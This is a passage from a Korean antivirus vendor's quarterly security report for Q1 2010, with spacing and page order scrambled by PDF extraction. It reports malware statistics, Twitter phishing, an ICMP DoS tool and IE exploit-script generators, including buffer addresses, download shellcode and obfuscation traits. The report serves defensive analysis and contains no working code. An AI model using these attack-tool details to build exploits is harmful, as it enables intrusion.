의취약점을이용하는것으로판명되었다. 해당취약점은 Internet Explorer 의 DOM(Document Object Model) 처리과정에서 HTML 엔진에존재하는 EVENTPARAM:: EVENTPARAM 함수에서발생한다. Internet Explorer 취약점은일반적으로위험하므로, 반드시보안패치가필요하며, 실제유명프로그램웹사이트가해킹되어 MS 취약점을이용하여악성코드유포에이용되는일도발생하였다. 그리고, 아직도많은수의웹사이트에서해당취약점을이용하기때문에각별한주의가필요하다. 중국산 DoS 툴의위험성최근에자동화된 DDoS( 분산서비스거부공격 ) 및 DoS( 서비스거부공격 ) 툴들이많이등장을하고있는데, 이중에서이번달에발견된 DoS 툴을살펴보면아래와같다. UI 로제작이되어있으며주된공격대상은 ICMP Flooding 기법을사용한다. 공격목표가되는 IP 를직접입력할수있도록되어있으며시간설정및공격데이터크기를최대 63kb까지설정가능하다. 이러한 DDoS 또는 DoS 를방어하기위해서는 DDoS 방어장비와방화벽등에서 Source Tracking( 소스추적 ) 과 State Limit ( 접속제한 ) 을적용하거나, 부하를분산하기위해서로드밸런싱등을적용하는방법이있다. Twitter Direct Message Phishing Spam Twitter의 Direct Message 기능을피싱공격에사용하는스팸이발생하였다. 해당스팸은사용자에게 haha. This you???? 라는메시지를전송하고, 사용자가메시지에포함된 URL을클릭하면가짜 Twitter 로그인페이지로이동하게한다. 여기에서수집된아이디와비밀번호는또다시스팸공격에활용되어, 해당사용자의 Follower들에게위와같은동일한방식으로메시지를전달하게된다. 이와같은공격이가능한원인중의하나는 Twiiter의글자제한이라는특성때문에사용되는 짧은 URL 서비스에있다. 사용자가직접해당링크를클릭하여이동하기전까지는해당 URL의원래주소를알수없기때문이다. 앞으로도이와비슷한유형의공격들이더욱많이발생할것으로예상된다. XSS, SQL-Injection 등의공격이가능한바코드생성기 XSS, SQL-Injection, Fuzzing 등다양한공격에활용될가능성이있는바코드를생성해주는도구가공개되었다. 2007년독일 CCC 컨퍼런스에서발표된 Toying with barcodes 와관련된도구로써, 해당발표에서는바코드로다양한공격문자열을만들어서바코드스캐너및활용시스템에대한공격가능성을다루었다. 이를활용하면, 바코드로입력을받은후에해당값을처리하는대부분의기계에대한공격이가능해진다. 특히, 대부분의스마트폰에서바코드를활용하는어플리케이션이존재하고, 이를점점더활용하는추세이기때문에해당기법을악용하여다양한보안문제가발생할수있을것으로보인다. AhnLab SiteGuard Pro & Security Center 14 ASEC Report _ Vol.03

17 3. 웹보안동향 월별악성코드가발견된도메인 웹보안통계 웹사이트보안요약 2010년 1분기악성코드발견건수는 798,502 건이고, 악성코드유형은 1,783건이며, 악성코드가발견된도메인은 2,917건이며, 악성코드발견된 URL은 12,214 건이다. 본자료는안철 [ 표 2-4] 웹사이트보안요약수연구소의웹보안제품인 SiteGuard의 2010년 1분기자료를바탕으로산출한통계정보이다. 월별악성코드발견건수 [ 그림 2-10] 월별악성코드가발견된도메인 2010년 1분기악성코드가발견된도메인은전분기의 2,223건에비해 131% 수준인 2,917건이다. 월별악성코드가발견된 URL [ 그림 2-11] 월별악성코드가발견된 URL [ 그림 2-8] 월별악성코드발견건수 2010년 1분기악성코드발견건수는전분기의 592,424건에비해 135% 수준인 798,502건이다. 월별악성코드유형 2010 년 1 분기악성코드가발견된 URL 은전분기의 14,983 건에비해 105% 수준인 15,790 건이다. 악성코드유형별배포수 [ 그림 2-9] 월별악성코드유형 [ 표 2-5] 악성코드유형별배포수 2010 년 1 분기악성코드유형은전분기의 3,231 건에비해 98% 수준 인 3,172 건이다. 세상에서가장안전한이름안철수연구소 15

18 는이러한피싱사이트를확인하기에는불가능하다고볼수있다. 트위터를이용한피싱사이트등장 [ 그림 2-12] 악성코드유형별배포수악성코드유형별배포수에서 TROJAN류가 248,629건전체의 31.1% 로 1위를차지하였으며, ADWARE류가 229,657건으로전체의 28.8% 로 2 위를차지하였다. 악성코드배포 Top 10 해외시각으로 2010년 2월 24일, 한블로그를통해유명소셜네트워크서비스 (Social Network Service) 웹사이트인트위터 (Twitter) 의다이렉트메시지 (Direct Messages) 에악의적인피싱웹사이트로연결되는링크가포함된것이발견되었다. 해당메시지에는일반적으로트위터사용자들이많이사용하는단축 URL(URL Shortening) 기법이적용된웹사이트링크가포함되어있었다. ASEC에서는다이렉트메시지로전달된해당단축 URL을분석한결과, 해당웹사이트링크를클릭하면트위터사용자로그인정보를탈취하기위한피싱사이트로연결이되었다. 해당트위터피싱웹사이트와사용자계정과암호가전송되는시스템은중국허베이 (Hebei) 에위치하고있어탈취된개인정보가중국으로전송된것을알수가있었다. 3월에도트위터의단축 URL을이용한악성코드유포사이트가발견되었으며, 앞으로트위터의단축 URL에대한사용자의각별한주의가필요하겠다. [ 표 2-6] 악성코드배포 Top 10 악성코드배포 Top10 에서 Win-Adware/Shortcut.InlivePlayerActiveX.234 이 122,180 건으로 1 위를 Win-Trojan/Downloader 이 77,003 건 2 위를기록하였다. 웹보안이슈 2010 년 1 분기에는도메인명정책변경에따른피싱 (Phishing) 과 Twitter 를이용한이슈가등장하였다. 도메인명정책변경으로인한피싱주의! 2010년부터도메인명에영어가아닌제3의외국문자를사용하는것이허용되었으며, 각국가에서다국어를사용하게되면서발생할수있는여러보안취약점중피싱과관련한보안문제가제기되었다. 실제단어는다르나눈으로보기엔똑같은형태로구현이가능하기때문에이러한문제점을이용한피싱사이트가생겨날수있다.( 예, 영문자 paypal 이러시아어로실제단어는 raural 이됨 ) 위와같은피싱사이트를예방하기위해서는이전까지는자신이접속한사이트에대한도메인명에대해서주의를기울이는등의예방법이있었지만, 이제는단순주의만으로 AhnLab Online Security ASEC Report _ Vol.03

19 III. 해외보안동향 1. 중국 1분기악성코드동향중국 2009년 12월웹사이트위변조보안사고동향 중국대륙의보안위협과사고를총괄하는 CNCERT/CC에서 2009년 12 월웹사이트위변조보안사고동향보고서를발표하였다. [ 그림 3-1] 금전적인목적으로판매되고있는중국의트로이목마판매웹사이트 CNCERT/CC에서발표한이번보고서에따르면 2009년 12월한달동안중국대륙에서만웹사이트위변조사고가감소한반면홍콩과대만모두증가하였다. 특히중국대륙의경우, 감소의폭이큰편으로이번 12 월에는총 2287건의웹사이트위변조사고가발생하여 11월2786건이감소한수치를보였다. 그외홍콩의경우 12월 12건이발생하여지난 11월과비교하여 6건이증가하고대만의경우 11월과비교하여 9건이증가한 11건이발생하였다고한다. 중국에서발견된 MS 취약점악용스크립트생성기 2010년 1월 22일 ASEC에서는 1월 15일발생한마이크로소프트 (Microsoft) 인터넷익스플로러 (Internet Explorer) 의알려지지않은취약점을악용한공격이발생한것을알리고이에대한상세한분석을진행하였다. 그리고실제공격이활성화되고있음으로마이크로소프트에서는해당취약점을제거할수있는보안패치 MS10-002를긴급으로배포하여해당취약점으로인한피해확산을막고자하였다. ASEC에서는해당취약점을악용하는보안위협들에대해추가적인정보수집및분석을진행하는과정에서중국언더그라운드웹사이트들에서 1월 20일경 MS 취약점을악용하는스크립트악성코드를자동으로생성하는공격툴이제작되고유포중인것을확인하였다. [ 그림 3-2] 중국에서발견된 MS 취약점악용스크립트생성기해당 MS 취약점악용하는자동화툴들은모두가운데박스부분에악성코드가위치할웹사이트주소만지정해주면자동으로해당취약점을악용하는스크립트파일이아래와같이생성되도록되어있다. [ 그림 3-3] MS 생성기에의해생성된스크립트악성코드 세상에서가장안전한이름안철수연구소 17

20 이번에발견된자동화툴에서생성된악의적인스크립트는기존에발견 된것들과비교하여버퍼 (Buffer) 주소가 0x0c0d0c0d 에서 0x0a0a0a0a 로변경되었다. [ 그림 3-4] 변경된버퍼주소 제작된쉘코드 (Shellcode) 역시특정파일을다운로드할수있는기능으로만정리되어스크립트가함수단위로더정교하게변경되었다. 그리고인터넷익스플로러로로딩되었는지를검사하는루틴과함께보안제품의진단을우회하기위해난독화가추가된특징들이있다. [ 그림 3-5] 쉘코드로분기하게되는코드 [ 그림 3-6] 금전적인목적으로판매되고있는중국의트로이목마판매웹사이트 이렇게자동으로취약점을악용하여스크립트악성코드를생성하는툴들은 2009년 7월에발견된중국산 MPEG2TuneRequest 취약점악용툴의사례가있었던것처럼중국언더그라운드에는더많이존재할것으로추정된다. 그러므로마이크로소프트의인터넷익스플로러사용자는마이크로소프트에서제공하는긴급보안패치인 MS10-002를즉시설치하여추가적인다른보안위협들에의한피해를예방하기바란다. 중국에서금전적인목적으로판매되고있는트로이목마들최근들어다시국내언론을통해중국발해킹으로인한개인정보유출사고가기사화되어알려지고있다. 이러한중국발해킹의주된원인으로금전적인대가를통한해킹이가장큰문제가되고있다. ASEC에서금전적인해킹과악성코드제작이성행하고있는중국언더그라운드를조사하던중트로이목마제작과함께분산서비스거부공격 (DDoS) 도구를판매하는웹사이트를파악하였다. 이번에파악한중국웹사이트는위이미지와같이트로이목마와분산서비스거부공격도구를판매하고있었으며, 한국인구매자들을위해한글웹페이지를제공하여트로목마와분산서비스거부공격도구의기능들에대해상세하게설명하고있었다. 해당웹사이트에서판매되고있는금액은트로이목마의경우만원에서십만원대에거래되고있으며분산서비스거부공격툴의경우에는수십만원에판매되고있었다. 이렇게금전적인목적으로악성코드나공격도구들의판매로인해새로운보안위협이지속적으로양산되고있음으로제도적으로이러한행위를차단하여야할것이다. AhnLab V3 Zip 18 ASEC Report _ Vol.03

21 2. 일본 1 분기악성코드동향 2010년 1분기일본의악성코드와관련주요이슈는악성코드배포를위해웹사이트를이용하는경우가증가하고있는것과브래도랩 (Win32/ Bredolab), 팔레보 (Win32/Palevo) 등전세계적으로많이유포가되고있는악성코드들의감염피해가일본에서도증가하고있는것을들수있다. 가짜백신등불법프로그램으로인한피해가지속적으로발생하고있는것또한일본에서문제가되고있다. 아래의 [ 표 3-1] 은일본트랜드마이크로사에서발표한 [ 인터넷보안위협월간리포트 ] 1 의내용중월간악성코드피해순위를집계한것이다. [ 표 3-2] 월별컴퓨터부정엑서스접수현황 ( 자료출처 : 일본 IPA) 최근에는다양한소프트웨어의보안취약점이해결되기전공격이빈번하게발생하고있고일반사용자들이이러한소프트웨어들의보안패치를인지하여적절하게업데이트를수행하는것이현실적으로쉽지않은일이므로피해예방을위한개인의보안의식못지않게기업의역할또한중요하다고할수있다. [ 그림 3-7] 은일본 IPA 1 에서발표한월별악성코드피해현황자료이다. [ 표 3-1] 월간악성코드피해현황 ( 자료출처 : 일본트랜드마이크로 ) 표에서볼수있듯이자바스크립트형악성코드들이많이감염되고있는데이러한악성스크립트 (SCRIPT) 들은대부분다양한악성코드를유포하기위해사용되므로감염된시스템은다른악성코드에감염되었을가능성이높다. 이러한스크립트들은대부분 OS나소프트웨어의보안취약점을악용하여사용자가의도하지않은동작을수행하고일본에서는이러한공격기법을간부라 ( ガンブラ-) 라고칭한다. 문제는웹사이트등에대한공격이점점빈번하게발생하고있고이로인한사용자피해도늘어나고있는것이다. 아래의 [ 표 3-2] 는일본 IPA에서발표한월별컴퓨터부정접근처리현황통계 2 로올해들어처리건수가많이늘어난것을알수있다. [ 그림 3-7] 월별악성코드피해현황 ( 자료출처 : 일본 IPA) [ 그림 3-7] 의일본 IPA 1 에서발표한월별악성코드피해현황을보면, 마이둠 (Win32/ Mydoom.worm) 과넷스카이 (Win32/Netsky.worm) 등이메일웜 (WORM) 이아직많이유포되고있는것을알수있으나이러한유형의악성코드들은점진적으로사라지고있다. 오토런 (AUTORUN) 악성코드유포가늘어나고있는것을알수있는데이러한현상은당분간계속될것으로보인다. 이외에도무무 (W32/Mumu) 웜과컨피커 (W32/Downad) 웜의피해가지속되고있는데이러한악성코드들은윈도우 OS의보안취약점을이용하여전파되는악성코드들이다. 이악성코드들은패스워드에대한유추기능이포함되어있어 OS 패치가되어있는경우일지라도취약한패스워드를이용하는경우감염이될수있으므로주의가필요하다 세상에서가장안전한이름안철수연구소 19

22 3. 세계 1 분기악성코드동향 2010년 1분기는허위백신프로그램의극성, 타겟공격, 인터넷익스플로러와어도비리더 (Adobe Reader) 에대한제로데이 (0 day) 취약점공격, 이슈검색어를이용한악성코드배포증가로정리할수있다. 러시아닥터웹에따르면사용자컴퓨터를사용하지못하게하고 7 유로 - 14 유로를요구하는 Trojan.Winlock 이 85 만대정도감염되었다고한다. 1, 2 주로러시아지역에서퍼진것으로보인다. 감염시스템통계를보면 1월에는 1 위는발견된지 5년이지난마이둠 (Mydoom) 웜, 넷스카이 (Netsky) 웜이 1,2위를차지했으며 2월에는 1위가레드로프바이러스 (Redlof virus) 가차지했다. 캐나다포티넷 (Fortinet) 에따르면상위권에존재하는악성코드는오토런 (Autorun), 브레도랩 (Bredolab) 등이있다. 3 메시지랩에따르면 1월에는 326.9개메일중 1개, 2월에는 302.8개메일중 1개, 358.3개메일중 1개에악성코드가포함되었다고한다. 4 러시아카스퍼스키연구소통계에따르면컨피커웜 (Conficker worm) 이상위권에속한다. 특이한점은샐리티바이러스 (Sality) 와바이럿 (Virut) 바이러스순위가높다. 5 허위백신프로그램들도진화를하게된다. 한글을포함한다국어를지원하는허위백신프로그램인 XP 인터넷시큐리티 (XP Internet Security) 가등장하였다. 단순히번역기를이용해어색한문장이존재하는수준이지만앞으로번역이잘되어각국사용자들의돈을노릴지도모른다 년 1월 12일구글 (google) 을포함한다수회사에대한타겟공격이알려졌다. 6 구글을포함한인터넷, 금융, 기술, 미디어, 화학등최소 34개업체와구글중국인권운동가메일계정으로도공격이들어왔다. 보안업데이트가제공되지않은제로데이취약점이이용되었다. 결국구글은 4월중국에서철수를결정하였다. 1월 19일에는동일취약점을이용한공격이한국에서도발생하였다. 세계각국에서타겟공격이꾸준히보고된다. 주로기업, 국가기관등을대상으로발생하고있으며정보유출이라는뚜렷한목적을가지고있다. 핀란드에서게임 & 퀴즈사이트에서 12만 7천개의계정과비밀번호가유출되었다. 7 한국에서는중국해커에의해 2천만명의개인정보가누출되는사고가발생하였다. 8 메인페이지변경정도에서금전적목적으로진화하는해커들은누출된개인정보를이용해서메신저피싱등에이용할가능성이높다. 악성코드배포방식은여전히해킹된웹사이트를통해전파되고있다. 하지만, 최근에는검색엔진최적화를이용한방식을이용한다. 악성코드제작자입장에서는악성코드를배포할사이트를 SEO(Search Engine Optimization) 알고리즘을이용하여검색결과상위에노출시킴으로써사용자가검색결과를클릭하여악성코드유포사이트로연결되게하는것이다. 1 또한, 봇넷에대한차단도지속적으로벌이고있다. 2월마이크로소프트사는 15억개스팸메일을발송한왈덱 (Waledac) 봇넷도메인 277개를차단하였다. 2010년 3월스페인에서마리포사봇넷운영자가검거되었다 만대이상감염되어역대최대규모라고한다. 최근에세계여러나라에서악성코드배포자를검거하고있다. 앞으로보안업체, 인터넷서비스제공업체, 경찰, 국가가협력해사이버암시장을이룬이들과대항해야할때가멀지않은것으로보인다 ASEC Report _ Vol.03

23

24